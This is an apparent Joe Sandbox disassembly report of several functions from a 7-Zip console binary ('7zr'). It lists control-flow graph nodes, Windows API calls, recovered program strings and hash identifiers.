                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 478 70993d-709950 call 70b5b1 481 709952-70995e call 6d1fb3 478->481 482 709963-70997e call 6e1f33 478->482 481->482 486 709980-70998a 482->486 487 70998f-709998 482->487 486->487 488 7099a8 487->488 489 70999a-7099a6 487->489 490 7099ab-7099b5 488->490 489->488 489->490 491 7099d5-709a04 call 6d1e0c call 70acb6 490->491 492 7099b7-7099cc GetStdHandle GetConsoleScreenBufferInfo 490->492 500 709a06-709a08 491->500 501 709a0c-709a24 call 6f7b48 491->501 492->491 493 7099ce-7099d2 492->493 493->491 500->501 503 709a29-709a48 call 70b96d call 6f7018 call 6e1aa4 501->503 510 709a4a-709a4c 503->510 511 709a7c-709aa8 call 6fddb5 503->511 513 709a66-709a77 _CxxThrowException 510->513 514 709a4e-709a55 510->514 517 709ac0-709ade 511->517 518 709aaa-709abb _CxxThrowException 511->518 513->511 514->513 516 709a57-709a64 call 6e1ac8 514->516 516->511 516->513 520 709ae0-709b04 call 6f7dd7 517->520 521 709b3a-709b55 517->521 518->517 529 709bfa-709c0b _CxxThrowException 520->529 530 709b0a-709b0e 520->530 525 709b57 521->525 526 709b5c-709ba4 call 6d1fa0 fputs call 6d1fa0 strlen * 2 521->526 525->526 539 709e25-709e4d call 6d1fa0 fputs call 6d1fa0 526->539 540 709baa-709be4 fputs fputc 526->540 533 709c10 529->533 530->529 532 709b14-709b38 call 70c077 call 6d1e40 530->532 532->520 532->521 536 709c12-709c25 533->536 543 709be6-709bf0 536->543 544 709c27-709c33 536->544 556 709e53 539->556 557 709f0c-709f34 call 6d1fa0 fputs call 6d1fa0 539->557 540->543 540->544 543->533 547 709bf2-709bf8 543->547 551 709c81-709cb1 call 70b67d call 6d2e04 544->551 552 709c35-709c3d 544->552 547->536 591 709d10-709d28 call 70b67d 551->591 592 709cb3-709cb7 551->592 554 709c6b-709c80 call 6d21d8 552->554 555 709c3f-709c4a 552->555 554->551 558 709c54 555->558 559 709c4c-709c52 555->559 562 709e5a-709e6f call 70b650 556->562 579 70ac23-70ac2a 557->579 580 709f3a 557->580 565 709c56-709c69 558->565 559->565 572 709e71-709e79 562->572 573 709e7b-709e7e call 6d21d8 562->573 565->554 565->555 585 709e83-709f06 call 70bde4 fputs call 6d1fa0 572->585 573->585 583 70ac3a-70ac66 call 70b96d call 6d1e40 call 6f3247 579->583 584 70ac2c-70ac33 579->584 586 709f41-709f9d call 70b650 call 70b5e9 call 70bde4 fputs call 6d1fa0 580->586 620 70ac68-70ac6a 583->620 621 70ac6e-70acb5 call 6d1e40 call 6d11c2 call 70be0c call 702db9 583->621 584->583 588 70ac35 call 70b988 584->588 585->557 585->562 662 709f9f 586->662 588->583 617 709d2a-709d4a fputs call 6d21d8 591->617 618 709d4b-709d53 591->618 598 709cc1-709cdd call 6d31e5 592->598 599 709cb9-709cbc call 6d315e 592->599 612 709d05-709d0e 598->612 613 709cdf-709d00 call 6d3221 call 6d31e5 call 6d1089 598->613 599->598 612->591 612->592 613->612 617->618 625 709d59-709d5d 618->625 626 709dff-709e1f call 6d1fa0 call 6d1e40 618->626 620->621 632 709d6e-709d82 625->632 633 709d5f-709d6d fputs 625->633 626->539 626->540 638 709df0-709df9 632->638 639 709d84-709d88 632->639 633->632 638->625 638->626 644 709d95-709d9f 639->644 645 709d8a-709d94 639->645 651 709da1-709da3 644->651 652 709da5-709db1 644->652 645->644 651->652 658 709dd8-709dee 651->658 660 709db3-709db6 652->660 661 709db8 652->661 658->638 658->639 665 709dbb-709dce 660->665 661->665 662->579 670 709dd0-709dd3 665->670 671 709dd5 665->671 670->658 671->658
                            APIs
                              • Part of subcall function 0070B5B1: fputs.MSVCRT ref: 0070B5CA
                              • Part of subcall function 0070B5B1: fputs.MSVCRT ref: 0070B5E1
                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 007099BD
                            • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 007099C4
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 00709A77
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 00709ABB
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                            • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&y$p&y$N
                            • API String ID: 377453556-2149508683
                            • Opcode ID: 65930a1cdc9a2a6110511d9e3570380b9b521e39bbc1c0b1716fdeed46441d31
                            • Instruction ID: 9e91618528c0277aab687de8fd06b024ca9eb02646f2f3b5c34190c5606fb17e
                            • Opcode Fuzzy Hash: 65930a1cdc9a2a6110511d9e3570380b9b521e39bbc1c0b1716fdeed46441d31
                            • Instruction Fuzzy Hash: 20226D71D00208DBDF15EFA4D885BADBBF2EF48310F20415AE545AB2D2CB399A85CF65
                            Function 006E1ADE Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 288COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 672 6e1ade-6e1b14 call 76fb10 call 6d13f5 677 6e1b16-6e1b2d call 6f1d73 _CxxThrowException 672->677 678 6e1b32-6e1b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->678 677->678 680 6e1b9d-6e1b9f 678->680 681 6e1b8d-6e1b91 678->681 684 6e1ba0-6e1bcd 680->684 681->680 683 6e1b93-6e1b97 681->683 683->680 685 6e1b99-6e1b9b 683->685 686 6e1bcf-6e1bf8 call 6e1ea4 call 6d27bb call 6d1e40 684->686 687 6e1bf9-6e1c12 684->687 685->684 686->687 688 6e1c14-6e1c18 687->688 689 6e1c20 687->689 688->689 692 6e1c1a-6e1c1e 688->692 693 6e1c27-6e1c2b 689->693 692->689 692->693 695 6e1c2d 693->695 696 6e1c34-6e1c3e 693->696 695->696 698 6e1c49-6e1c53 696->698 699 6e1c40-6e1c43 696->699 701 6e1c5e-6e1c68 698->701 702 6e1c55-6e1c58 698->702 699->698 703 6e1c6a-6e1c6d 701->703 704 6e1c73-6e1c79 701->704 702->701 703->704 706 6e1c7b-6e1c87 704->706 707 6e1cc9-6e1cd2 704->707 708 6e1c89-6e1c93 706->708 709 6e1c95-6e1ca1 call 6e1ed1 706->709 710 6e1cea call 6e1eb9 707->710 711 6e1cd4-6e1ce6 707->711 708->707 718 6e1ca3-6e1cbb call 6f1d73 _CxxThrowException 709->718 719 6e1cc0-6e1cc3 709->719 715 6e1cef-6e1cf8 710->715 711->710 716 6e1cfa-6e1d0a 715->716 717 6e1d37-6e1d40 715->717 720 6e1dc2-6e1dd4 wcscmp 716->720 721 6e1d10 716->721 723 6e1d46-6e1d52 717->723 724 6e1e93-6e1ea1 717->724 718->719 719->707 725 6e1d17-6e1d1f call 6d9399 720->725 727 6e1dda-6e1de6 call 6e1ed1 720->727 721->725 723->724 728 6e1d58-6e1d93 call 6d26dd call 6d280c call 6d3221 call 6d3bbf 723->728 725->717 735 6e1d21-6e1d32 call 756a60 call 6d9313 725->735 727->725 736 6e1dec-6e1e04 call 6f1d73 _CxxThrowException 727->736 756 6e1d9f-6e1da3 728->756 757 6e1d95-6e1d9c 728->757 735->717 744 6e1e09-6e1e0c 736->744 747 6e1e0e 744->747 748 6e1e31-6e1e4a call 6e1f0c GetCurrentProcess SetProcessAffinityMask 744->748 751 6e1e14-6e1e2c call 6f1d73 _CxxThrowException 747->751 752 6e1e10-6e1e12 747->752 761 6e1e4c-6e1e82 GetLastError call 6d3221 call 6d58a9 call 6d31e5 call 6d1e40 748->761 762 6e1e83-6e1e92 call 6d3172 call 6d1e40 748->762 751->748 752->748 752->751 756->744 760 6e1da5-6e1dbd call 6f1d73 _CxxThrowException 756->760 757->756 760->720 761->762 762->724
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E1AE3
                              • Part of subcall function 006D13F5: __EH_prolog.LIBCMT ref: 006D13FA
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1B2D
                            • _fileno.MSVCRT ref: 006E1B3E
                            • _isatty.MSVCRT ref: 006E1B47
                            • _fileno.MSVCRT ref: 006E1B5D
                            • _isatty.MSVCRT ref: 006E1B60
                            • _fileno.MSVCRT ref: 006E1B73
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1CBB
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1DBD
                            • wcscmp.MSVCRT ref: 006E1DCA
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1E04
                            • _isatty.MSVCRT ref: 006E1B76
                              • Part of subcall function 006F1D73: __EH_prolog.LIBCMT ref: 006F1D78
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1E2C
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 006E1E3B
                            • SetProcessAffinityMask.KERNEL32(00000000), ref: 006E1E42
                            • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 006E1E4C
                            Strings
                            • Set process affinity mask: , xrefs: 006E1D74
                            • Unsupported switch postfix -stm, xrefs: 006E1DAA
                            • SeLockMemoryPrivilege, xrefs: 006E1D28
                            • Unsupported switch postfix for -slp, xrefs: 006E1DF1
                            • : ERROR : , xrefs: 006E1E52
                            • Unsupported switch postfix -bb, xrefs: 006E1CA8
                            • unsupported value -stm, xrefs: 006E1E19
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                            • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                            • API String ID: 1826148334-1115009270
                            • Opcode ID: d8ea1de1e20a8086a22ec1af79832e046684a32a35d00a29a8d247614567bd3f
                            • Instruction ID: 0dbd6ca666d2ee8a1ee25257c98c968ebcb84a577d1e8b45328730fdebc8821b
                            • Opcode Fuzzy Hash: d8ea1de1e20a8086a22ec1af79832e046684a32a35d00a29a8d247614567bd3f
                            • Instruction Fuzzy Hash: 1EC10571901385EFDB11EFB5C888BD9BBF2AF1A340F14849DE4899B392C778A944CB14
                            Function 00708012 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 777 708012-708032 call 76fb10 780 708285 777->780 781 708038-70806c fputs call 708341 777->781 782 708287-708295 780->782 785 7080c8-7080cd 781->785 786 70806e-708071 781->786 787 7080d6-7080df 785->787 788 7080cf-7080d4 785->788 789 708073-708089 fputs call 6d1fa0 786->789 790 70808b-70808d 786->790 791 7080e2-708110 call 708341 call 708622 787->791 788->791 789->785 793 708096-70809f 790->793 794 70808f-708094 790->794 804 708112-708119 call 70831f 791->804 805 70811e-70812f call 708565 791->805 795 7080a2-7080c7 call 6d2e47 call 7085c6 call 6d1e40 793->795 794->795 795->785 804->805 805->782 812 708135-70813f 805->812 813 708141-708148 call 7082bb 812->813 814 70814d-70815b 812->814 813->814 814->782 817 708161-708164 814->817 818 7081b6-7081c0 817->818 819 708166-708186 817->819 820 708276-70827f 818->820 821 7081c6-7081e1 fputs 818->821 824 708298-70829d 819->824 825 70818c-708196 call 708565 819->825 820->780 820->781 821->820 827 7081e7-7081fb 821->827 828 7082b1-7082b9 SysFreeString 824->828 829 70819b-70819d 825->829 830 708273 827->830 831 7081fd-70821f 827->831 828->782 829->824 832 7081a3-7081b4 SysFreeString 829->832 830->820 834 708221-708245 831->834 835 70829f-7082a1 831->835 832->818 832->819 838 7082a3-7082ab call 6d965d 834->838 839 708247-708271 call 7084a7 call 6d965d SysFreeString 834->839 836 7082ae 835->836 836->828 838->836 839->830 839->831
                            APIs
                            • __EH_prolog.LIBCMT ref: 00708017
                            • fputs.MSVCRT ref: 0070804D
                              • Part of subcall function 00708341: __EH_prolog.LIBCMT ref: 00708346
                              • Part of subcall function 00708341: fputs.MSVCRT ref: 0070835B
                              • Part of subcall function 00708341: fputs.MSVCRT ref: 00708364
                            • fputs.MSVCRT ref: 0070807A
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                            • SysFreeString.OLEAUT32(00000000), ref: 007081AA
                            • fputs.MSVCRT ref: 007081CD
                            • SysFreeString.OLEAUT32(00000000), ref: 00708267
                            • SysFreeString.OLEAUT32(00000000), ref: 007082B1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                            • String ID: --$----$Path$Type$Warning: The archive is open with offset
                            • API String ID: 2889736305-3797937567
                            • Opcode ID: dd723f7054b3623ebc76285a6ef148a4a26a59ddce2933fb6feecabb1d1725c8
                            • Instruction ID: 2368724183b8e9c8b4a0dfa549599b66404492963ed644903fb6236cb452d006
                            • Opcode Fuzzy Hash: dd723f7054b3623ebc76285a6ef148a4a26a59ddce2933fb6feecabb1d1725c8
                            • Instruction Fuzzy Hash: A1918831A00609EFCF54DFA4CD84AAEB7F5FF48350F20422DE486A7291DB78A905CB61
                            Function 00706766 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 135COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 846 706766-706792 call 76fb10 EnterCriticalSection 849 706794-706799 call 70c7d7 846->849 850 7067af-7067b7 846->850 854 70679e-7067ac 849->854 852 7067b9 call 6d1f91 850->852 853 7067be-7067c3 850->853 852->853 856 706892-7068a8 853->856 857 7067c9-7067d5 853->857 854->850 860 706941 856->860 861 7068ae-7068b4 856->861 858 706817-70682f 857->858 859 7067d7-7067dd 857->859 862 706831-706842 call 6d1fa0 858->862 863 706873-70687b 858->863 859->858 865 7067df-7067eb 859->865 864 706943-70695a 860->864 861->860 866 7068ba-7068c2 861->866 862->863 880 706844-70686c fputs call 6d2201 862->880 868 706881-706887 863->868 869 706933-70693f call 70c5cd 863->869 870 7067f3-706801 865->870 871 7067ed 865->871 866->869 872 7068c4-7068e6 call 6d1fa0 fputs 866->872 868->869 875 70688d 868->875 869->864 870->863 877 706803-706815 fputs 870->877 871->870 884 7068e8-7068f9 fputs 872->884 885 7068fb-706917 call 6e4f2a call 6d1fb3 call 6d1e40 872->885 881 70692e call 6d1f91 875->881 883 70686e call 6d1fa0 877->883 880->883 881->869 883->863 889 70691c-706928 call 6d1fa0 884->889 885->889 889->881
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070676B
                            • EnterCriticalSection.KERNEL32(00792938), ref: 00706781
                            • fputs.MSVCRT ref: 0070680B
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 00706944
                              • Part of subcall function 0070C7D7: fputs.MSVCRT ref: 0070C840
                            • fputs.MSVCRT ref: 00706851
                              • Part of subcall function 006D2201: fputs.MSVCRT ref: 006D221E
                            • fputs.MSVCRT ref: 007068D9
                            • fputs.MSVCRT ref: 007068F6
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                            • String ID: v$8)y$8)y$Sub items Errors:
                            • API String ID: 2670240366-3845136838
                            • Opcode ID: 5a1b63265e49605d1fef37bdb8f6ecfe981a1ee06e5cd11b87293bb30baccb25
                            • Instruction ID: c2c84d1d30b9764ea2b52a7fe02c40a8a938c5cdf58de237cb8ff3dcf95626bb
                            • Opcode Fuzzy Hash: 5a1b63265e49605d1fef37bdb8f6ecfe981a1ee06e5cd11b87293bb30baccb25
                            • Instruction Fuzzy Hash: 0351A031900640DFCB259F64D9A4AADB7E2FF84350F54862EE19A8B2A1CB787C94CB54
                            Function 00706359 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 898 706359-706373 call 76fb10 901 706375-706385 call 70c7d7 898->901 902 70639e-7063af call 705a4d 898->902 901->902 907 706387-70639b 901->907 908 7063b5-7063cd 902->908 909 7065ee-7065f1 902->909 907->902 910 7063d2-7063d4 908->910 911 7063cf 908->911 912 7065f3-7065fb 909->912 913 706624-70663c 909->913 916 7063d6-7063d9 910->916 917 7063df-7063e7 910->917 911->910 918 706601-706607 call 708012 912->918 919 7066ea call 70c5cd 912->919 914 706643-70664b 913->914 915 70663e call 6d1f91 913->915 914->919 923 706651-70668f fputs call 6d211a call 6d1fa0 call 708685 914->923 915->914 916->917 922 7064b1-7064bc call 706700 916->922 924 706411-706413 917->924 925 7063e9-7063f2 call 6d1fa0 917->925 927 70660c-70660e 918->927 933 7066ef-7066fd 919->933 944 7064c7-7064cf 922->944 945 7064be-7064c1 922->945 923->933 980 706691-706697 923->980 928 706442-706446 924->928 929 706415-70641d 924->929 925->924 949 7063f4-70640c call 6d210c call 6d1fa0 925->949 927->933 934 706614-70661f call 6d1fa0 927->934 938 706497-70649f 928->938 939 706448-706450 928->939 935 70642a-70643b 929->935 936 70641f-706425 call 706134 929->936 934->919 935->928 936->935 938->922 950 7064a1-7064ac call 6d1fa0 call 6d1f91 938->950 946 706452-70647a fputs call 6d1fa0 call 6d1fb3 call 6d1fa0 939->946 947 70647f-706490 939->947 954 7064d1-7064da call 6d1fa0 944->954 955 7064f9-7064fb 944->955 945->944 953 7065a2-7065a6 945->953 946->947 947->938 949->924 950->922 962 7065a8-7065b6 953->962 963 7065da-7065e6 953->963 954->955 985 7064dc-7064f4 call 6d210c call 6d1fa0 954->985 959 70652a-70652e 955->959 960 7064fd-706505 955->960 971 706530-706538 959->971 972 70657f-706587 959->972 968 706512-706523 960->968 969 706507-70650d call 706134 960->969 973 7065d3 962->973 974 7065b8-7065ca call 706244 962->974 963->908 977 7065ec 963->977 968->959 969->968 982 706567-706578 971->982 983 70653a-706562 fputs call 6d1fa0 call 6d1fb3 call 6d1fa0 971->983 972->953 987 706589-706595 call 6d1fa0 972->987 973->963 974->973 999 7065cc-7065ce call 6d1f91 974->999 977->909 988 706699-70669f 980->988 989 7066df-7066e5 call 6d1f91 980->989 982->972 983->982 985->955 987->953 1002 706597-70659d call 6d1f91 987->1002 996 7066a1-7066b1 fputs 988->996 997 7066b3-7066ce call 6e4f2a call 6d1fb3 call 6d1e40 988->997 989->919 1003 7066d3-7066da call 6d1fa0 996->1003 997->1003 999->973 1002->953 1003->989
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070635E
                            • fputs.MSVCRT ref: 0070645F
                              • Part of subcall function 0070C7D7: fputs.MSVCRT ref: 0070C840
                            • fputs.MSVCRT ref: 00706547
                            • fputs.MSVCRT ref: 0070665F
                            • fputs.MSVCRT ref: 007066AE
                              • Part of subcall function 006D1F91: fflush.MSVCRT ref: 006D1F93
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog$fflushfree
                            • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                            • API String ID: 1750297421-1898165966
                            • Opcode ID: 3087027e9519f4b3086780b754a13b02f0a2e3d469b1421b361162512cc26a8e
                            • Instruction ID: 09e4f0294943082af54b9c3d8cafbba93ac96f41cf691ba178163b5cf4a54467
                            • Opcode Fuzzy Hash: 3087027e9519f4b3086780b754a13b02f0a2e3d469b1421b361162512cc26a8e
                            • Instruction Fuzzy Hash: 79B18E70A01701DFDB64EF60C9A5BAAB7E2FF44304F04862EE55A47292CB78A964CF54
                            Function 006D9C8F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1016 6d9c8f-6d9cc2 GetModuleHandleA GetProcAddress 1017 6d9cef-6d9d06 GlobalMemoryStatus 1016->1017 1018 6d9cc4-6d9ccc GlobalMemoryStatusEx 1016->1018 1019 6d9d08 1017->1019 1020 6d9d0b-6d9d0d 1017->1020 1018->1017 1021 6d9cce-6d9cd7 1018->1021 1019->1020 1022 6d9d11-6d9d15 1020->1022 1023 6d9cd9 1021->1023 1024 6d9ce5 1021->1024 1026 6d9cdb-6d9cde 1023->1026 1027 6d9ce0-6d9ce3 1023->1027 1025 6d9ce8-6d9ced 1024->1025 1025->1022 1026->1024 1026->1027 1027->1025
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006D9CB3
                            • GetProcAddress.KERNEL32(00000000), ref: 006D9CBA
                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 006D9CC8
                            • GlobalMemoryStatus.KERNEL32(?), ref: 006D9CFA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                            • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                            • API String ID: 180289352-802862622
                            • Opcode ID: 0ec75e4b8d9ce51683d965fa7a3259bcf7fa671139c224e10beb4e276d946294
                            • Instruction ID: 93f93dc198df296d4159decf8eb29dd9f68414851f2ac7115471bc2daed494d7
                            • Opcode Fuzzy Hash: 0ec75e4b8d9ce51683d965fa7a3259bcf7fa671139c224e10beb4e276d946294
                            • Instruction Fuzzy Hash: 091109B0D102099BDF20DF94D84AA9DB7F6BF08745F10441ED446EB340E778A984CB64
                            Function 0071F1B2 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1028 71f1b2-71f1ce call 76fb10 call 6e1168 1032 71f1d3-71f1d5 1028->1032 1033 71f1db-71f1e4 call 71f3e4 1032->1033 1034 71f36a-71f378 1032->1034 1037 71f1e6-71f1e8 1033->1037 1038 71f1ed-71f1f2 1033->1038 1037->1034 1039 71f203-71f21a 1038->1039 1040 71f1f4-71f1f9 1038->1040 1043 71f231-71f248 memcpy 1039->1043 1044 71f21c-71f22c _CxxThrowException 1039->1044 1040->1039 1041 71f1fb-71f1fe 1040->1041 1041->1034 1045 71f24c-71f257 1043->1045 1044->1043 1046 71f259 1045->1046 1047 71f25c-71f25e 1045->1047 1046->1047 1048 71f281-71f299 1047->1048 1049 71f260-71f26f 1047->1049 1057 71f311-71f313 1048->1057 1058 71f29b-71f2a0 1048->1058 1050 71f271 1049->1050 1051 71f279-71f27b 1049->1051 1052 71f273-71f275 1050->1052 1053 71f277 1050->1053 1051->1048 1054 71f315-71f318 1051->1054 1052->1051 1052->1053 1053->1051 1056 71f357-71f368 1054->1056 1056->1034 1057->1056 1058->1054 1059 71f2a2-71f2b5 call 71f37b 1058->1059 1063 71f2f0-71f30c memmove 1059->1063 1064 71f2b7-71f2cf call 76e1a0 1059->1064 1063->1045 1067 71f2d1-71f2eb call 71f37b 1064->1067 1068 71f31a-71f355 memcpy 1064->1068 1067->1064 1072 71f2ed 1067->1072 1068->1056 1072->1063
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cx$Cx
                            • API String ID: 3519838083-1521322968
                            • Opcode ID: 0a1d0742715ad0f44ff3aef5a36586077e80ef5885b6d2156300fdd5c6e021e6
                            • Instruction ID: ff6b26c7189aab87b3df2131f2252a3e0b8136396cb9a29dc095fd7a46ee44e9
                            • Opcode Fuzzy Hash: 0a1d0742715ad0f44ff3aef5a36586077e80ef5885b6d2156300fdd5c6e021e6
                            • Instruction Fuzzy Hash: D5519376A003099FDB14DFA8C8C4BFEB3B5FF88354F148429E911AB281D778AD458B60
                            Function 0076FF3A Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                            • String ID:
                            • API String ID: 4012487245-0
                            • Opcode ID: b12c154c2e3866b65399520ae56aa64e94b7b1ea79474865b839280aa29d765d
                            • Instruction ID: 1fc0190605d1e4d13a2ba6cc6e1ed6405fe2273060635a8d472f8beaa49d39ae
